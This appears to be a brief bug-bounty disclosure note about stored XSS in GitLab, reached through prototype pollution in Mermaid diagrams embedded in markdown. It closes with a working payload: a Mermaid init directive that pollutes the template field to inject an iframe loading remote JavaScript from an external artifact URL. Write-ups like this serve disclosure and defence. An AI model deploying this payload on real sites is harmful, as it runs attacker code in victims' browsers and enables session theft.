[GitLab] Stored XSS via Mermaid Prototype Pollution vulnerability (3000 USD)

We discussed this vulnerability as part of our weekly podcast on 30 November 2021

Prototype pollution through a Mermaid diagram embedded in markdown leading to stored XSS.

Rather than trying to describing how Mermaid works the payload can show this issue pretty clearly. The init field allows setting of __proto__ (and prototype was used to bypass the first fix). This can be used to pollute the template field which enabled XSS.

%%{init: { '__proto__': {'template': '<iframe xmlns=\"http://www.w3.org/1999/xhtml\" srcdoc=\"&lt;script src=https://gitlab.com/bugbountyuser1/csp/-/jobs/1030502035/artifacts/raw/payload.js&gt; &lt;/script&gt;\">'}} }%%